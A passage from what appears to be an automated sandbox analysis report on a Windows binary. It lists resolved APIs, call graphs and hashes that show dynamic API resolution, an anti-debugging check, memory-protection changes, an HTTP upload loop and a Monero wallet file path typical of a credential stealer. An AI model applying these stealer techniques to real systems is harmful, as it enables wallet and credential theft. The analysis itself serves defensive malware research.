1245c0 2 API calls 13993->13994 13995 122ecf 13994->13995 13996 1245c0 2 API calls 13995->13996 13997 122ee8 13996->13997 13998 1245c0 2 API calls 13997->13998 13999 122f01 13998->13999 14000 1245c0 2 API calls 13999->14000 14001 122f1a 14000->14001 14002 1245c0 2 API calls 14001->14002 14003 122f33 14002->14003 14004 1245c0 2 API calls 14003->14004 14005 122f4c 14004->14005 14006 1245c0 2 API calls 14005->14006 14007 122f65 14006->14007 14008 1245c0 2 API calls 14007->14008 14009 122f7e 14008->14009 14010 1245c0 2 API calls 14009->14010 14011 122f97 14010->14011 14012 1245c0 2 API calls 
14011->14012 14013 122fb0 14012->14013 14014 1245c0 2 API calls 14013->14014 14015 122fc9 14014->14015 14016 1245c0 2 API calls 14015->14016 14017 122fe2 14016->14017 14018 1245c0 2 API calls 14017->14018 14019 122ffb 14018->14019 14020 1245c0 2 API calls 14019->14020 14021 123014 14020->14021 14022 1245c0 2 API calls 14021->14022 14023 12302d 14022->14023 14024 1245c0 2 API calls 14023->14024 14025 123046 14024->14025 14026 1245c0 2 API calls 14025->14026 14027 12305f 14026->14027 14028 1245c0 2 API calls 14027->14028 14029 123078 14028->14029 14030 1245c0 2 API calls 14029->14030 14031 123091 14030->14031 14032 1245c0 2 API calls 14031->14032 14033 1230aa 14032->14033 14034 1245c0 2 API calls 14033->14034 14035 1230c3 14034->14035 14036 1245c0 2 API calls 14035->14036 14037 1230dc 14036->14037 14038 1245c0 2 API calls 14037->14038 14039 1230f5 14038->14039 14040 1245c0 2 API calls 14039->14040 14041 12310e 14040->14041 14042 1245c0 2 API calls 14041->14042 14043 123127 14042->14043 14044 1245c0 2 API calls 14043->14044 14045 123140 14044->14045 14046 1245c0 2 API calls 14045->14046 14047 123159 14046->14047 14048 1245c0 2 API calls 14047->14048 14049 123172 14048->14049 14050 1245c0 2 API calls 14049->14050 14051 12318b 14050->14051 14052 1245c0 2 API calls 14051->14052 14053 1231a4 14052->14053 14054 1245c0 2 API calls 14053->14054 14055 1231bd 14054->14055 14056 1245c0 2 API calls 14055->14056 14057 1231d6 14056->14057 14058 1245c0 2 API calls 14057->14058 14059 1231ef 14058->14059 14060 1245c0 2 API calls 14059->14060 14061 123208 14060->14061 14062 1245c0 2 API calls 14061->14062 14063 123221 14062->14063 14064 1245c0 2 API calls 14063->14064 14065 12323a 14064->14065 14066 1245c0 2 API calls 14065->14066 14067 123253 14066->14067 14068 1245c0 2 API calls 14067->14068 14069 12326c 14068->14069 14070 1245c0 2 API calls 14069->14070 14071 123285 14070->14071 14072 1245c0 2 API calls 14071->14072 14073 12329e 14072->14073 14074 1245c0 2 API calls 14073->14074 
14075 1232b7 14074->14075 14076 1245c0 2 API calls 14075->14076 14077 1232d0 14076->14077 14078 1245c0 2 API calls 14077->14078 14079 1232e9 14078->14079 14080 1245c0 2 API calls 14079->14080 14081 123302 14080->14081 14082 1245c0 2 API calls 14081->14082 14083 12331b 14082->14083 14084 1245c0 2 API calls 14083->14084 14085 123334 14084->14085 14086 1245c0 2 API calls 14085->14086 14087 12334d 14086->14087 14088 1245c0 2 API calls 14087->14088 14089 123366 14088->14089 14090 1245c0 2 API calls 14089->14090 14091 12337f 14090->14091 14092 1245c0 2 API calls 14091->14092 14093 123398 14092->14093 14094 1245c0 2 API calls 14093->14094 14095 1233b1 14094->14095 14096 1245c0 2 API calls 14095->14096 14097 1233ca 14096->14097 14098 1245c0 2 API calls 14097->14098 14099 1233e3 14098->14099 14100 1245c0 2 API calls 14099->14100 14101 1233fc 14100->14101 14102 1245c0 2 API calls 14101->14102 14103 123415 14102->14103 14104 1245c0 2 API calls 14103->14104 14105 12342e 14104->14105 14106 1245c0 2 API calls 14105->14106 14107 123447 14106->14107 14108 1245c0 2 API calls 14107->14108 14109 123460 14108->14109 14110 1245c0 2 API calls 14109->14110 14111 123479 14110->14111 14112 1245c0 2 API calls 14111->14112 14113 123492 14112->14113 14114 1245c0 2 API calls 14113->14114 14115 1234ab 14114->14115 14116 1245c0 2 API calls 14115->14116 14117 1234c4 14116->14117 14118 1245c0 2 API calls 14117->14118 14119 1234dd 14118->14119 14120 1245c0 2 API calls 14119->14120 14121 1234f6 14120->14121 14122 1245c0 2 API calls 14121->14122 14123 12350f 14122->14123 14124 1245c0 2 API calls 14123->14124 14125 123528 14124->14125 14126 1245c0 2 API calls 14125->14126 14127 123541 14126->14127 14128 1245c0 2 API calls 14127->14128 14129 12355a 14128->14129 14130 1245c0 2 API calls 14129->14130 14131 123573 14130->14131 14132 1245c0 2 API calls 14131->14132 14133 12358c 14132->14133 14134 1245c0 2 API calls 14133->14134 14135 1235a5 14134->14135 14136 1245c0 2 API calls 14135->14136 14137 1235be 
14136->14137 14138 1245c0 2 API calls 14137->14138 14139 1235d7 14138->14139 14140 1245c0 2 API calls 14139->14140 14141 1235f0 14140->14141 14142 1245c0 2 API calls 14141->14142 14143 123609 14142->14143 14144 1245c0 2 API calls 14143->14144 14145 123622 14144->14145 14146 1245c0 2 API calls 14145->14146 14147 12363b 14146->14147 14148 1245c0 2 API calls 14147->14148 14149 123654 14148->14149 14150 1245c0 2 API calls 14149->14150 14151 12366d 14150->14151 14152 1245c0 2 API calls 14151->14152 14153 123686 14152->14153 14154 1245c0 2 API calls 14153->14154 14155 12369f 14154->14155 14156 1245c0 2 API calls 14155->14156 14157 1236b8 14156->14157 14158 1245c0 2 API calls 14157->14158 14159 1236d1 14158->14159 14160 1245c0 2 API calls 14159->14160 14161 1236ea 14160->14161 14162 1245c0 2 API calls 14161->14162 14163 123703 14162->14163 14164 1245c0 2 API calls 14163->14164 14165 12371c 14164->14165 14166 1245c0 2 API calls 14165->14166 14167 123735 14166->14167 14168 1245c0 2 API calls 14167->14168 14169 12374e 14168->14169 14170 1245c0 2 API calls 14169->14170 14171 123767 14170->14171 14172 1245c0 2 API calls 14171->14172 14173 123780 14172->14173 14174 1245c0 2 API calls 14173->14174 14175 123799 14174->14175 14176 1245c0 2 API calls 14175->14176 14177 1237b2 14176->14177 14178 1245c0 2 API calls 14177->14178 14179 1237cb 14178->14179 14180 1245c0 2 API calls 14179->14180 14181 1237e4 14180->14181 14182 1245c0 2 API calls 14181->14182 14183 1237fd 14182->14183 14184 1245c0 2 API calls 14183->14184 14185 123816 14184->14185 14186 1245c0 2 API calls 14185->14186 14187 12382f 14186->14187 14188 1245c0 2 API calls 14187->14188 14189 123848 14188->14189 14190 1245c0 2 API calls 14189->14190 14191 123861 14190->14191 14192 1245c0 2 API calls 14191->14192 14193 12387a 14192->14193 14194 1245c0 2 API calls 14193->14194 14195 123893 14194->14195 14196 1245c0 2 API calls 14195->14196 14197 1238ac 14196->14197 14198 1245c0 2 API calls 14197->14198 14199 1238c5 14198->14199 
API calls 15846->15847 15848 1253f2 15847->15848 15849 13a8a0 lstrcpy 15848->15849 15850 1253fb 15849->15850 15851 13a9b0 4 API calls 15850->15851 15852 12541a 15851->15852 15853 13a8a0 lstrcpy 15852->15853 15854 125423 15853->15854 15855 13a9b0 4 API calls 15854->15855 15856 125444 15855->15856 15857 13a8a0 lstrcpy 15856->15857 15858 12544d 15857->15858 15859 13a9b0 4 API calls 15858->15859 15860 12546e 15859->15860 15861 13a8a0 lstrcpy 15860->15861 15953 138ead CryptBinaryToStringA 15952->15953 15957 138ea9 15952->15957 15954 138ece GetProcessHeap RtlAllocateHeap 15953->15954 15953->15957 15955 138ef4 ctype 15954->15955 15954->15957 15956 138f05 CryptBinaryToStringA 15955->15956 15956->15957 15957->15798 15961->15234 16204 129880 15962->16204 15964 1298e1 15964->15241 15966 13a740 lstrcpy 15965->15966 15967 12fb16 15966->15967 16082 13a740 lstrcpy 16081->16082 16139 13a740 lstrcpy 16138->16139 16140 130266 16139->16140 16141 138de0 2 API calls 16140->16141 16142 13027b 16141->16142 16143 13a920 3 API calls 16142->16143 16144 13028b 16143->16144 16145 13a8a0 lstrcpy 16144->16145 16146 130294 16145->16146 16147 13a9b0 4 API calls 16146->16147 16148 1302b8 16147->16148 16205 12988e 16204->16205 16208 126fb0 16205->16208 16207 1298ad ctype 16207->15964 16211 126d40 16208->16211 16212 126d63 16211->16212 16224 126d59 16211->16224 16212->16224 16225 126660 16212->16225 16214 126dbe 16214->16224 16231 1269b0 16214->16231 16216 126e2a 16217 126ee6 VirtualFree 16216->16217 16219 126ef7 16216->16219 16216->16224 16217->16219 16218 126f41 16222 1389f0 2 API calls 16218->16222 16218->16224 16219->16218 16220 126f26 FreeLibrary 16219->16220 16221 126f38 16219->16221 16220->16219 16223 1389f0 2 API calls 16221->16223 16222->16224 16223->16218 16224->16207 16229 12668f VirtualAlloc 16225->16229 16227 126730 16228 126743 VirtualAlloc 16227->16228 16230 12673c 16227->16230 16228->16230 16229->16227 16229->16230 16230->16214 16232 1269c9 16231->16232 16236 1269d5 16231->16236 
16233 126a09 LoadLibraryA 16232->16233 16232->16236 16234 126a32 16233->16234 16233->16236 16238 126ae0 16234->16238 16241 138a10 GetProcessHeap RtlAllocateHeap 16234->16241 16236->16216 16237 126ba8 GetProcAddress 16237->16236 16237->16238 16238->16236 16238->16237 16239 1389f0 2 API calls 16239->16238 16240 126a8b 16240->16236 16240->16239 16241->16240

                              Control-flow Graph (rendered graph omitted; function at 00139860, blocks 139860-139bc2)
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,00FF2488), ref: 001398A1
                              • GetProcAddress.KERNEL32(74DD0000,00FF2308), ref: 001398BA
                              • GetProcAddress.KERNEL32(74DD0000,00FF2470), ref: 001398D2
                              • GetProcAddress.KERNEL32(74DD0000,00FF2320), ref: 001398EA
                              • GetProcAddress.KERNEL32(74DD0000,00FF2500), ref: 00139903
                              • GetProcAddress.KERNEL32(74DD0000,00FF9128), ref: 0013991B
                              • GetProcAddress.KERNEL32(74DD0000,00FE5E10), ref: 00139933
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D90), ref: 0013994C
                              • GetProcAddress.KERNEL32(74DD0000,00FF2218), ref: 00139964
                              • GetProcAddress.KERNEL32(74DD0000,00FF2230), ref: 0013997C
                              • GetProcAddress.KERNEL32(74DD0000,00FF2338), ref: 00139995
                              • GetProcAddress.KERNEL32(74DD0000,00FF2380), ref: 001399AD
                              • GetProcAddress.KERNEL32(74DD0000,00FE5E30), ref: 001399C5
                              • GetProcAddress.KERNEL32(74DD0000,00FF2398), ref: 001399DE
                              • GetProcAddress.KERNEL32(74DD0000,00FF23B0), ref: 001399F6
                              • GetProcAddress.KERNEL32(74DD0000,00FE5DB0), ref: 00139A0E
                              • GetProcAddress.KERNEL32(74DD0000,00FF23E0), ref: 00139A27
                              • GetProcAddress.KERNEL32(74DD0000,00FF2458), ref: 00139A3F
                              • GetProcAddress.KERNEL32(74DD0000,00FE5AD0), ref: 00139A57
                              • GetProcAddress.KERNEL32(74DD0000,00FF24B8), ref: 00139A70
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C90), ref: 00139A88
                              • LoadLibraryA.KERNEL32(00FF2518,?,00136A00), ref: 00139A9A
                              • LoadLibraryA.KERNEL32(00FF2560,?,00136A00), ref: 00139AAB
                              • LoadLibraryA.KERNEL32(00FF25A8,?,00136A00), ref: 00139ABD
                              • LoadLibraryA.KERNEL32(00FF2530,?,00136A00), ref: 00139ACF
                              • LoadLibraryA.KERNEL32(00FF25C0,?,00136A00), ref: 00139AE0
                              • GetProcAddress.KERNEL32(75A70000,00FF2548), ref: 00139B02
                              • GetProcAddress.KERNEL32(75290000,00FF2578), ref: 00139B23
                              • GetProcAddress.KERNEL32(75290000,00FF2590), ref: 00139B3B
                              • GetProcAddress.KERNEL32(75BD0000,00FF25D8), ref: 00139B5D
                              • GetProcAddress.KERNEL32(75450000,00FE5E50), ref: 00139B7E
                              • GetProcAddress.KERNEL32(76E90000,00FF91C8), ref: 00139B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00139BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00139BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                              • Instruction ID: 614679c99423c9862a666fad4b6f31916b63a8d8283405dfd32c011538b07139
                              • Opcode Fuzzy Hash: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                              • Instruction Fuzzy Hash: 02A15BB5500A409FD346EFA8EE889563BFDF78C301F04C51AE615A3264D7F9A841EF22

                              Control-flow Graph (rendered graph omitted; function at 001245C0, blocks 1245c0-1247a9)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0012460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0012479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30 occurrences): 001245C7, 001245D2, 001245DD, 001245E8, 001245F3, 00124617, 00124622, 0012462D, 00124638, 00124643, 00124657, 00124662, 0012466D, 00124678, 00124683, 001246AC, 001246B7, 001246C2, 001246CD, 001246D8, 00124713, 0012471E, 00124729, 00124734, 0012473F, 0012474F, 0012475A, 00124765, 00124770, 0012477B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (same string referenced 30 times)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 02b81af2dd20b63afe5b4a9134efabdd0d7bc8eb2f03a51254b02fe12f2417af
                              • Instruction ID: ad618cc9829bfd96f830e96c86ca86cf438e160298937c26cfbf473ac6a33245
                              • Opcode Fuzzy Hash: 02b81af2dd20b63afe5b4a9134efabdd0d7bc8eb2f03a51254b02fe12f2417af
                              • Instruction Fuzzy Hash: 04411460EEB6047BE728FFA498E2E9D77577F46F0CF987044AC2056293CBB0670145A2

                              Control-flow Graph (rendered graph omitted; function at 00124880, blocks 124880-124fa2, WinINet request/response loop)
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124915
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 0012493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00124ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00140DDB,00000000,?,?,00000000,?,",00000000,?,00FFE8C8), ref: 00124DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00124E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00124E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00124E49
                              • InternetCloseHandle.WININET(00000000), ref: 00124EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00124EC5
                              • HttpOpenRequestA.WININET(00000000,00FFE898,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00124B15
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • InternetCloseHandle.WININET(00000000), ref: 00124ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                              • Instruction ID: c767a06c44d1aca1c2d499cf6dbd1a979ddda38f64ee0ba0d002a7938dd03842
                              • Opcode Fuzzy Hash: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                              • Instruction Fuzzy Hash: 5412C972950118AADB15EBA0DCA2FEEB778BF64305F904199F14672091EF702F49CF62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                              • Instruction ID: b32a5893357df11d5925120855b5bdad4d0e6cfad7d19e167cb3c7a574d79a64
                              • Opcode Fuzzy Hash: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                              • Instruction Fuzzy Hash: 21F04FB1944609ABCB14DF98DD49BAEFBBCEB09711F10425AFA05A3680C7B415048FA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                              • Instruction ID: 9c286f9793f08283c77209842a7084fcab405134633cee892b3670e25b5aea26
                              • Opcode Fuzzy Hash: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                              • Instruction Fuzzy Hash: 78D05E7490030CDBCB00DFE0D84A6EDBB7CFB08312F000554DD0572340EB709491CAA6

                               Control-flow Graph (rendered graph not preserved in this extraction; legend: Executed / Not Executed)
                               Basic blocks listed as "node: address range, API calls -> successor nodes":
                               • 633: 139c10-139c1a -> 634, 635
                               • 634: 139c20-13a031 GetProcAddress * 43 -> 635
                               • 635: 13a036-13a0ca LoadLibraryA * 8 -> 636, 637
                               • 636: 13a146-13a14d -> 638, 639
                               • 637: 13a0cc-13a141 GetProcAddress * 5 -> 636
                               • 638: 13a153-13a211 GetProcAddress * 8 -> 639
                               • 639: 13a216-13a21d -> 640, 641
                               • 640: 13a298-13a29f -> 642, 643
                               • 641: 13a21f-13a293 GetProcAddress * 5 -> 640
                               • 642: 13a337-13a33e -> 644, 645
                               • 643: 13a2a5-13a332 GetProcAddress * 6 -> 642
                               • 644: 13a344-13a41a GetProcAddress * 9 -> 645
                               • 645: 13a41f-13a426 -> 646, 647
                               • 646: 13a4a2-13a4a9 -> 648, 649
                               • 647: 13a428-13a49d GetProcAddress * 5 -> 646
                               • 648: 13a4ab-13a4d7 GetProcAddress * 2 -> 649
                               • 649: 13a4dc-13a4e3 -> 650, 651
                               • 650: 13a515-13a51c -> 652, 653
                               • 651: 13a4e5-13a510 GetProcAddress * 2 -> 650
                               • 652: 13a612-13a619 -> 654, 655
                               • 653: 13a522-13a60d GetProcAddress * 10 -> 652
                               • 654: 13a61b-13a678 GetProcAddress * 4 -> 655
                               • 655: 13a67d-13a684 -> 656, 657
                               • 656: 13a686-13a699 GetProcAddress -> 657
                               • 657: 13a69e-13a6a5 -> 658, 659
                               • 658: 13a6a7-13a703 GetProcAddress * 4 -> 659
                               • 659: 13a708-13a709
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,00FE5B70), ref: 00139C2D
                              • GetProcAddress.KERNEL32(74DD0000,00FE5BB0), ref: 00139C45
                              • GetProcAddress.KERNEL32(74DD0000,00FF96B8), ref: 00139C5E
                              • GetProcAddress.KERNEL32(74DD0000,00FF9670), ref: 00139C76
                              • GetProcAddress.KERNEL32(74DD0000,00FF96D0), ref: 00139C8E
                              • GetProcAddress.KERNEL32(74DD0000,00FF96A0), ref: 00139CA7
                              • GetProcAddress.KERNEL32(74DD0000,00FEB900), ref: 00139CBF
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4E8), ref: 00139CD7
                              • GetProcAddress.KERNEL32(74DD0000,00FFD470), ref: 00139CF0
                              • GetProcAddress.KERNEL32(74DD0000,00FFD548), ref: 00139D08
                              • GetProcAddress.KERNEL32(74DD0000,00FFD578), ref: 00139D20
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C10), ref: 00139D39
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C30), ref: 00139D51
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C50), ref: 00139D69
                              • GetProcAddress.KERNEL32(74DD0000,00FE5CB0), ref: 00139D82
                              • GetProcAddress.KERNEL32(74DD0000,00FFD3F8), ref: 00139D9A
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4B8), ref: 00139DB2
                              • GetProcAddress.KERNEL32(74DD0000,00FEB978), ref: 00139DCB
                              • GetProcAddress.KERNEL32(74DD0000,00FE5CD0), ref: 00139DE3
                              • GetProcAddress.KERNEL32(74DD0000,00FFD428), ref: 00139DFB
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4D0), ref: 00139E14
                              • GetProcAddress.KERNEL32(74DD0000,00FFD590), ref: 00139E2C
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4A0), ref: 00139E44
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D30), ref: 00139E5D
                              • GetProcAddress.KERNEL32(74DD0000,00FFD488), ref: 00139E75
                              • GetProcAddress.KERNEL32(74DD0000,00FFD440), ref: 00139E8D
                              • GetProcAddress.KERNEL32(74DD0000,00FFD5A8), ref: 00139EA6
                              • GetProcAddress.KERNEL32(74DD0000,00FFD500), ref: 00139EBE
                              • GetProcAddress.KERNEL32(74DD0000,00FFD410), ref: 00139ED6
                              • GetProcAddress.KERNEL32(74DD0000,00FFD458), ref: 00139EEF
                              • GetProcAddress.KERNEL32(74DD0000,00FFD518), ref: 00139F07
                              • GetProcAddress.KERNEL32(74DD0000,00FFD530), ref: 00139F1F
                              • GetProcAddress.KERNEL32(74DD0000,00FFD560), ref: 00139F38
                              • GetProcAddress.KERNEL32(74DD0000,00FFA900), ref: 00139F50
                              • GetProcAddress.KERNEL32(74DD0000,00FFCDF8), ref: 00139F68
                              • GetProcAddress.KERNEL32(74DD0000,00FFD098), ref: 00139F81
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D50), ref: 00139F99
                              • GetProcAddress.KERNEL32(74DD0000,00FFD050), ref: 00139FB1
                              • GetProcAddress.KERNEL32(74DD0000,00FE59F0), ref: 00139FCA
                              • GetProcAddress.KERNEL32(74DD0000,00FFD038), ref: 00139FE2
                              • GetProcAddress.KERNEL32(74DD0000,00FFCFD8), ref: 00139FFA
                              • GetProcAddress.KERNEL32(74DD0000,00FE5950), ref: 0013A013
                              • GetProcAddress.KERNEL32(74DD0000,00FE5A70), ref: 0013A02B
                              • LoadLibraryA.KERNEL32(00FFCE40,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A03D
